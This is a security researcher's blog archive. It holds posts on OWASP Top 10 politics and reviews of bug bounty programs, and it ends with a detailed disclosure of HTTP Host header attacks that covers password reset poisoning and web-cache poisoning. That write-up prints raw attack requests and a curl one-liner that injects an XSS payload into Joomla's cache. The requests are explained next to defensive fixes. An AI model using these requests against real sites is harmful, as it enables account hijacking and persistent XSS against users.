Monday, 24 April 2017

Abusing OWASP with 'Insufficient Attack Protection'

I have no love for drama but over the last couple of years I’ve witnessed some shameless abuse of OWASP by commercial interests and feel it's important to call this out.

The latest draft of the OWASP TOP 10 ‘Most Critical Web Application Security Risks’ added a new entry at A7, titled ‘Insufficient Attack Protection’. It claims that failing to detect and respond to attacks is a critical risk.

This is a surprising and distinctly out of place addition to the top 10; every other entry is a serious vulnerability that poses a notable risk by itself, whereas failure to detect attacks is only hazardous when combined with a real vulnerability.

Furthermore, addressing any other entry in the top 10 provides a clear net positive to a webapp’s security posture, whereas complying with A7 can easily cause a net harm. Complying with A7 makes it extremely awkward to run an accessible bug bounty program, since it will hinder researchers trying to help you out. It also increases your attack surface (much like antivirus software) and introduces the risk of denial of service attacks by spoofing attacks from other users.

I’m not the only one in the community who thinks Insufficient Attack Protection has no place in the top 10 - a poll by @thornmaker found 80% of 110 respondents thought it should be removed.

At this point, you might be wondering where A7 came from. According to a contributer, it was "suggested by Contrast Security and *only* by Contrast Security".

I wonder why Contrast Security made this suggestion? Well, we can find a clue on their website - they’ve already started using A7 to flog ‘Contrast Protect’, their shiny attack protection solution:
A7: Insufficient Attack Protection. This new requirement means that applications need to detect, prevent, and respond to both manual and automated attacks. […] Contrast Protect effectively blocks attacks by injecting the protection directly into the application where it can take advantage of the full application context.

Still, perhaps I shouldn’t rush to assume Contrast Security is acting in bad faith and abusing the OWASP brand name to sell a product. It’s not like they’ve done anything like this before is it?

In 2015 Contrast/Aspect released a tool to evaluate vulnerability scanners dubbed “OWASP Benchmark”. This is much lower profile than the OWASP Top 10, but I work for a web scanner vendor myself so it caught my attention. Just like the new OWASP Top 10, there was something a bit odd about it - it ranked Contrast’s scanner vastly higher than all the competition, something they made sure to point out in marketing materials.

Here’s what Simon Bennets, the OWASP project leader for ZAP had to say:
Here we have a company that leads an OWASP project that just happens to show that their offering in this area appears to be _significantly_ better than any of the competition. Their recent press release stresses that its an OWASP project, make the most of the fact that the US DHS helped fund it but make no mention of their role in developing it.

Simon's post caused extensive discussion on the OWASP leaders mailing list, eventually leading to Jim Manico (an OWASP board member at the time) calling for the project to be demoted to 'incubator' status, in order to reflect the project's immaturity. The project is still in the incubator status. This hasn’t stopped Gartner from using it to compare scanning vendors, so I guess Contrast still got their money’s worth.

All in all I think it’s pretty clear why Insufficient Attack Protection has suddenly appeared. Perhaps the OWASP Top 10 should be demoted to incubator status too :-)

- albinowax

Thursday, 11 August 2016

Reviewing bug bounties - a hacker's perspective

A prospective bug bounty hunter today has very little information on which to base his or her decision about which programs to participate in. There's a dramatic horror story every few months and that's about it. This is unfortunate because bounty hunting is founded on mutual trust; nobody wants to spend hours auditing a target only to find out that the client is disrespectful, incompetent, or likes to avoid paying out. I thought it might be helpful to write up reviews of the different bounty programs and platforms that I've dealt with.

You might be wondering exactly how much bug bounty hunting I've done in order to feel qualified to write this, particularly as I only bother writing up bounties if I consider them highly notable. I've been doing this in my spare time for roughly five years - my first bounty from Google was back in 2011 and I reported enough issues to star in their 0x0A list when it was first created in 2012. Over the years I've also reported a bunch of issues to Mozilla, a few of which are public (side note: the SQLi on is hilarious).  Other activity is visible on Hacker One, Cobalt, Bugcrowd, and in a few blog posts. I've received maybe 50 separate bounties in total. I view this as a decent sample.

I’ll try to provide the evidence and reasoning behind my conclusions, particularly when I had a poor experience with a program. Due to trust being critical to the bounty process, if my first experience with a bounty program was bad I would never use it again. So, if I give somewhere a bad review it’s always possible I was just unlucky. If you strongly agree or disagree with any of these reviews, do drop a comment or write up your own experience.

To keep things competitive, I’ve sorted the reviews by how good the overall experience is. Scroll down for the dirt.

Program Reviews


Google is consistently a pleasure to work with. They have a highly skilled, responsive and respectful security team, and offer healthy payouts. They also offer to double bounties if you donate them to charity, which is pretty cool. And they sometimes send shiny gifts to their top researchers, and there's the awesome party in Vegas... The only ‘downside’ is that these days, actually finding a decent vulnerability in one of their core products can be tricky relative to other targets.

We do have a disagreement about who bears responsibility for preventing CSV Injection attacks but they're going to change their minds soon so that's ok ;)
Uber (hackerone)
Uber is my current focus for bounty hunting because their scope is huge, they pay exceptionally well, and they don’t try to wriggle out of paying rewards. My last three bounties from Uber were $3000,  $7500 and $5000 for reflected and stored XSS respectively. As their bounty program is much younger than Google’s, it takes significantly less effort to find decent vulnerabilities in their websites.

Uber’s commitment to putting everything in scope is exceptional - Uber and Bugcrowd both use the same third party to host their documentation, and while Bugcrowd declared their documentation out of scope Uber worked with the third party to keep their documentation in scope. The somewhat amusing result is that if it wasn’t for Uber’s bug bounty program, it would be trivial to get administrative access to

That said, I’ve found their triage team a little frustrating at times. For example, I provided a detailed writeup clearly explaining how to replicate some reflected XSS, and they responded by asking me submit a video. I get the impression that they sometimes skim read reports and miss critical details such as “It's designed to work in Internet Explorer 11”.


Mozilla is interesting in that you often get to interact directly with the developers responsible for fixing your vulnerabilities, via bugzilla. This can be a blessing and a curse - it’s important to remember you can always summon the security team to mediate. I did have one bad experience with them early on - I reported a stored XSS bug where I couldn’t provide a poc due to a length limitation, and the developer fixed it within a few hours then argued it wasn’t a security issue. However, other times I’ve been paid $3k for vulnerabilities I thought were pretty lame - they certainly aren’t stingy with payouts.

Mozilla are another example of where diligent bounty scoping improves the security of the entire web ecosystem. While many bounty programs refuse to pay up for exploits in third party code, Mozilla happily pay for any exploits for the Django framework that you can replicate on, and everyone using Django is undoubtedly more secure as a result.

Another benefit of Mozilla is that if you request it, they’re happy to publicly disclose most bugs after they’ve been fixed. I view this as significantly better than being placed in a generic hall of fame, particularly if you’re early in your career - potential employers can see the technical details of your bugs. Overall I enjoy working with Mozilla even if the process isn’t always as slick as Google.


Shortly after their program opened, I reported CSRF via form-action-hijacking to them and got $1,000 on one of their highly 1337 debit cards for my troubles. It took quite a few emails before their security team fully understood the vulnerability, but they were cordial the whole time and the vulnerability is pretty esoteric so that’s understandable.


As you might expect from a free open source project the bounties aren’t massive - I got $242 for unauthenticated stored XSS - but they’re friendly and highly responsive. The main thing to beware of is that although they’ll give public credit, they prefer that critical vulnerability details aren’t disclosed even after patches have been released, to mitigate poor patch uptake.

I don't think this is a great policy, but it helps understand the context behind it. Piwik is the only program where I’ve personally seen clear evidence of black market interest in high quality exploits. I think this is because it’s deployable and widely used - you could probably get a foothold in all sorts of organisations with an exploit for it.

CodePen  (bugcrowd)

Codepen are the coolest program I’ve dealt with that doesn’t pay cash bounties. I got remote code execution on their site a few times, had a nice chat with them and they graciously agreed to let me disclose the full details at BlackHat USA last year.


I reported stored XSS on to them on April 20th, and they replied within 2 days but didn’t actually confirm it until June 6th which is pretty slow. The reward was $500 and I have yet to be paid but I have confidence it’ll arrive one of these months.

The most notable thing about Prezi’s program is that they  go to extraordinary lengths to prove that they aren’t cheating people by fraudulently marking issues as duplicates, using secret gists on github. It’s cool that they make this effort but I think it’s unnecessary really; if you view a company as dishonest you should stay well clear of their bounty program. There are plenty of other ways they can screw you over if they want to.

AwardWallet,, Zendesk, Informatica, WP-API, Fastmail, unnamed others

I’ve reported issues to them without issue or anything of note happening, other than Zendesk claiming the dubious achievement of awarding me the lowest non-zero bounty I've ever received for XSS - $50, with which I could just about buy lunch out after tax.

Cloudflare (hackerone)

Their program appears to be under-resourced. I reported an XSS to them on April 16th and they took over two weeks to first respond to it, and still have yet to fix it. This is sadly a frequent occurrence with programs that don’t pay cash bounties. Even if you’re bounty hunting for recognition rather than income, I’d recommend focusing on programs that pay a token cash bounty because at least you can be reasonably sure they take it seriously.  (bugcrowd)

I reported a fairly serious vulnerability to these guys and they fixed the issue and changed the status to resolved without saying a word. While I admire their efficiency, I've had better interactions with vending machines.


I reported a serious CSRF issue to Ebay several years ago and despite numerous emails back and forth, they failed to understand it. As far as I know the issue remains unpatched to this day.

Dropbox (hackerone)

Dropbox state that they pay $5000 for XSS, so when I reported a vulnerability that could be used to gain read/write access to users’ dropbox folders given a small amount of user interaction, I was a bit puzzled to get $0. The exploit is a bit unusual, so instead of trusting my reasoning you might want to take a look at the report and come to your own conclusion. I’m not surprised that they protested when I requested public disclosure of the issue. On the bright side, I found the vulnerability by accident so I only wasted about half an hour on them.

Western Union (bugcrowd)

Western Union appears to be a glaring exception to the concept that companies that pay cash bounties take their programs seriously.

I reported two vulnerabilities to them. Both were (in my professional opinion) fairly serious, and distinctly obvious. The first was marked as a duplicate of an issue reported over a year prior. Failing to patch an obvious vulnerability for over a year shows disrespect towards the numerous researchers who inevitably waste their time reporting it. The second received a $100 reward. When a company claims they pay $100-$5000 per vulnerability, I find it somewhat surprising to receive $100 for a bug that could probably be used to steal money.

Zomato (hackerone)
Zomato have provided my worst bounty experience so far. I generally have low expectations for commercial companies that don't pay cash bounties, but I was still surprised when they refused to reply to my issue, even after I used HackerOne's apparently ineffective 'request remediation' feature.

After 90 days I decided to publicly disclose the issue, only to discover they had silently patched it. I'm still waiting for them to reply to my submission, or mark it as resolved. Here's the entire thrilling report:

I wrote up the associated research over at

Platform Reviews

HackerOne platform

Of all the bug bounty platforms, HackerOne comes across as the best developed from a hacker’s perspective. I particularly appreciate the heavily integrated support for full disclosure and overall transparency. You can easily identify the payout range of many programs using publicly disclosed vulnerabilities, and spare yourself unpleasant surprises. The reputation/signal system also makes it stand out. Yet another cool hackerone feature I'd like to see in other platforms is that if the hacker requests it, vulnerabilities are automatically disclosed after a fixed time length without the company having to manually approve it.

One problem I've encountered on HackerOne is vendors not noticing reports. I had to use a personal contact to get WP-API to respond to a serious access control bypass, and an issue I reported to BitHunt 6 months ago still hasn't been replied to. I invoked HackerOne's 'request mediation' function on BitHunt and they failed to respond too. Inactive companies should really be clearly marked as such to prevent researchers wasting their time.

I’ve found companies that offer larger bounties are less likely to have this issue - sizeable rewards is a good indicator that the company is actually committed to the bounty program.

Cobalt platform

Cobalt (formerly crowdcurity) has a whole bunch of bitcoin related websites which are really fun to hack, although the bounties aren’t the biggest. Regardless of the bounty size, I like the warm fuzzy feeling of knowing I could have stolen a huge number of bitcoins if I felt like it. Unfortunately I can’t name the specific sites, but will be disclosing technical details of many of these vulnerabilities in my "Exploiting CORS Misconfigurations for Bitcoins and Bounties" presentation at OWASP AppSecUSA.

Cobalt's platform isn't dripping with as many features as HackerOne's but it does the job. It also lets hackers score bug bounty programs and provide feedback, which is frankly awesome - reputation shouldn't just apply to hackers. I don't know if this is directly related, but on the whole I've had good experiences with programs on Cobalt, and definitely recommend giving them a shout. The main thing to beware of is that payouts can take a while - someone found a race condition in the bitcoin withdrawal function and I think they're all manually reviewed now.

Bugcrowd platform
After a few poor experiences in a row with programs on Bugcrowd I mostly avoid them and therefore don't have much to say. I think they've been around the longest, and they don't deliver payments in bitcoins (subjecting all non-US users to Paypal’s awful exchange rates), but they evidently put effort into engaging with the community by presenting at conferences and releasing tools.

I’m sure there are good programs on there but I'll leave hunting them down to someone else.

About Payouts

Posts on bug bounties are frequently visited by commenters suggesting that the bug hunter could have got more cash by selling the vulnerability on ‘the black market’. My last payout was $5000 from Uber for an issue that took me six hours to find and write up. Do I feel shortchanged? No, and I wouldn’t have felt shortchanged with $500 either. I’m always happy to receive a large payout but I don’t feel entitled to it unless there’s a clear precedent. Could I have used that vulnerability to hijack a bunch of Uber developer accounts and cause well over $30k of carnage? Probably, but why would I want to do that? I honestly hope I won’t feel compelled to revisit this topic later. We’ll see.

That was it?

If you believe what some people write, you might conclude that every bug bounty program is out to exploit testers, wriggle out of paying rewards, pretend issues are duplicates and generally acting in bad faith. As you've hopefully gathered by reading this far, this does not reflect my own experience at all, and it would be a shame if this misconception put anyone off bounty hunting. The primary causes of drama seem to be broken expectations about payout size and program scope. Companies can mitigate these by writing clearly defined bounty briefings and encouraging publicly disclosed reports. Hackers can mitigate these by reading the briefs, using available information like publicly disclosed reports to set their expectations, and providing feedback on both good and bad experiences.

Hope that's helpful! Feel free to drop your own reviews in the comments or on your own site.

Monday, 25 April 2016

Exploiting Uber and Piwik with adapted AngularJS payloads

I don't normally blog about bug bounty findings, but I recently found a couple on Piwik and Uber based on AngularJS template injection that have some interesting technical subtleties. As such, I've published it on

The Piwik exploit may actually allow unauthenticated RCE so I'd suggest patching ASAP. Many thanks to @garethheyes for helping with the payload adaptions.

Wednesday, 19 August 2015

Server-Side Template Injection

I've written up a novel technique to get RCE on webservers - Server-Side Template Injection - over at I presented this at Black Hat USA 2015 - you can watch a recording at

Shortly afterwards, I  presented at 44Con 2015 on Hunting Asynchronous Vulnerabilities. You can read a summary at or watch the recording (paid only alas) at

Wednesday, 18 February 2015

Exploiting Path Relative Style-Sheet Imports (PRSSI)

I've posted a detailed breakdown of how to succesfully exploit path-relative stylesheet imports and navigate the associated pitfalls over at


Saturday, 30 August 2014

Comma Separated Vulnerabilities

My latest research, on exploiting spreadsheet-export functionality to attack users via malicious formulae, is over at:

Please note I no longer work at Context.

Wednesday, 1 May 2013

Practical HTTP Host header attacks

    Password reset and web-cache poisoning

        (And a little surprise in RFC-2616)


How does a deployable web-application know where it is? Creating a trustworthy absolute URI is trickier than it sounds. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to:
     <link href="http://_SERVER['HOST']"    (Joomla)

...and append secret keys and tokens to links containing it:
    <a href="http://_SERVER['HOST']?token=topsecret">  (Django, Gallery, others)

....and even directly import scripts from it:
      <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4">  (Various)

    There are two main ways to exploit this trust in regular web applications. The first approach is web-cache poisoning; manipulating caching systems into storing a page generated with a malicious Host and serving it to others. The second technique abuses alternative channels like password reset emails where the poisoned content is delivered directly to the target. In this post I'll look at how to exploit each of these in the presence of 'secured' server configurations, and how to successfully secure applications and servers.

Password reset poisoning

    Popular photo-album platform Gallery uses a common approach to forgotten password functionality. When a user requests a password reset it generates a (now) random key:

Places it in a link to the site:

and emails to the address on record for that user. [Full code] When the user visits the link, the presence of the key proves that they can read content sent to the email address, and thus must be the rightful owner of the account.

The vulnerability was that url::abs_site used the Host header provided by the person requesting the reset, so an attacker could trigger password reset emails poisoned with a hijacked link by tampering with their Host header:
> POST /password/reset HTTP/1.1
> Host:
> ...
> csrf=1e8d5c9bceb16667b1b330cc5fd48663&name=admin

    This technique also worked on Django, Piwik and Joomla, and still works on a few other major applications, frameworks and libraries that I can't name due to an unfortunate series of mistakes on my part.

Of course, this attack will fail unless the target clicks the poisoned link in the unexpected password reset email. There are some techniques for encouraging this click but I'll leave those to your imagination.

In other cases, the Host may be URL-decoded and placed directly into the email header allowing mail header injection. Using this, attackers can easily hijack accounts by BCCing password reset emails to themselves - Mozilla Persona had an issue somewhat like this, back in alpha. Even if the application's mailer ignores attempts to BCC other email addresses directly, it's often possible to bounce the email to another address by injecting \r\nReturn-To: followed by an attachment engineered to trigger a bounce, like a zip bomb.

Cache poisoning

Web-cache poisoning using the Host header was first raised as a potential attack vector by Carlos Beuno in 2008. 5 years later there's no shortage of sites implicitly trusting the host header so I'll focus on the practicalities of poisoning caches. Such attacks are often difficult as all modern standalone caches are Host-aware; they will never assume that the following two requests reference the same resource:

> GET /index.html HTTP/1.1       > GET /index.html HTTP/1.1
> Host:              > Host:

So, to persuade a cache to serve our poisoned response to someone else we need to create a disconnect between the host header the cache sees, and the host header the application sees. In the case of the popular caching solution Varnish, this can be achieved using duplicate Host headers. Varnish uses the first host header it sees to identify the request, but Apache concatenates all host headers present and Nginx uses the last host header[1]. This means that you can poison a Varnish cache with URLs pointing at by making the following request:
> GET / HTTP/1.1
> Host:
> Host:
Application-level caches can also be susceptible. Joomla writes the Host header to every page without HTML-encoding it, and its cache is entirely oblivious to the Host header. Gaining persistent XSS on the homepage of a Joomla installation was as easy as:
curl -H "Host: cow\"onerror='alert(1)'rel='stylesheet'" | fgrep cow\"

This will create the following request:
> GET / HTTP/1.1
> Host: cow"onerror='alert(1)'rel='stylesheet'

The response should show a poisoned <link> element:
<link href="http://cow"onerror='alert(1)'rel='stylesheet'/" rel="canonical"/>
To verify that the cache has been poisoned, just load the homepage in a browser and observe the popup.

'Secured' configurations

    So far I've assumed that you can make a HTTP request with an arbitrary Host header arrive at any application. Given that the intended purpose of the Host header is to ensure that a request is passed to the correct application at a given IP address, it's not always that simple.

Sometimes it is trivial. If Apache receives an unrecognized Host header, it passes it to the first virtual host defined in httpd.conf. As such, it's possible to pass requests with arbitrary host headers directly to a sizable number of applications. Django was aware of this default-vhost risk and responded by advising that users create a dummy default-vhost to act as a catchall for requests with unexpected Host headers, ensuring that Django applications never got passed requests with unexpected Host headers.

The first bypass for this used X-Forwarded-For's friend, the X-Forwarded-Host header, which effectively overrode the Host header. Django was aware of the cache-poisoning risk and fixed this issue in September 2011 by disabling support for the X-Forwarded-Host header by default. Mozilla neglected to update, which I discovered in April 2012 with the following request:
> POST /en-US/firefox/user/pwreset HTTP/1.1> Host:
> X-Forwarded-Host:

Even patched Django installations were still vulnerable to attack. Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful syntax:
> POST /en-US/firefox/user/pwreset HTTP/1.1> Host:

This resulted in the following (admittedly suspicious) password reset link:

If you click it, you'll notice that your browser sends the key to before creating the suspicious URL popup. Django released a patch for this issue shortly after I reported it:

Unfortunately, Django's patch simply used a blacklist to filter @ and a few other characters. As the password reset email is sent in plaintext rather than HTML, a space breaks the URL into two separate links:

> POST /en-US/firefox/users/pwreset HTTP/1.1
> Host:
Django's followup patch ensured that the port specification in the Host header could only contain numbers, preventing the port-based attack entirely.  However, the arguably ultimate authority on virtual hosting, RFC2616, has the following to say:

5.2 The Resource Identified by a Request
If Request-URI is an absoluteURI, the host is part of the Request-URI. Any Host header field value in the request MUST be ignored.

The result? On Apache and Nginx  (and all compliant servers) it's possible to route requests with arbitrary host headers to any application present by using an absolute URI:
> Host:
This request results in a SERVER_NAME of but a HTTP['HOST'] of Applications that use SERVER_NAME rather than HTTP['HOST'] are unaffected by this particular trick, but can still be exploited on common server configurations. See HTTP_HOST vs. SERVER_NAME for more information of the difference between these two variables.  Django fixed this in February 2013 by enforcing a whitelist of allowed hosts. See the documentation for more details. However, these attack techniques still work fine on many other web applications.

Securing servers

Due to the aforementioned absolute request URI technique, making the Host header itself trustworthy is almost a lost cause. What you can do is make SERVER_NAME trustworthy. This can be achieved under Apache (instructions) and Nginx (instructions) by creating a dummy vhost that catches all requests with unrecognized Host headers. It can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. I'd recommend using both approaches wherever possible.

A patch for Varnish should be released shortly. As a workaround until then, you can add the following to the config file:
        import std;

        sub vcl_recv {

Securing applications

Fixing this issue is difficult, as there is no entirely automatic way to identify which host names the administrator trusts. The safest, albeit mildly inconvenient solution, is to use Django's approach of requiring administrators to provide a whitelist of trusted domains during the initial site setup process. If that is too drastic, at least ensure that SERVER_NAME is used instead of the Host header, and encourage users to use a secure server configuration.

Further research

  • More effective / less inconvenient fixes
  • Automated detection
  • Exploiting wildcard whitelists with XSS & window.history
  • Exploiting multipart password reset emails by predicting boundaries
  • Better cache fuzzing (trailing Host headers?)

Thanks to Mozilla for funding this research via their bug-bounty program, Varnish for the handy workaround, and the teams behind Django, Gallery, and Joomla for their speedy patches.

If you're interested in automated detection of this issue, check out the ActiveScan++ plugin I made for Burp Suite. (Disclaimer: I work for PortSwigger). For a discussion of how this extension works, and a demo of web-cache poisoning against Typo3,  see the following video from OWASP AppSec EU: ActiveScan++: Augmenting manual testing with attack proxy plugins.

Feel free to drop a comment, email or DM me if you have any observations or queries.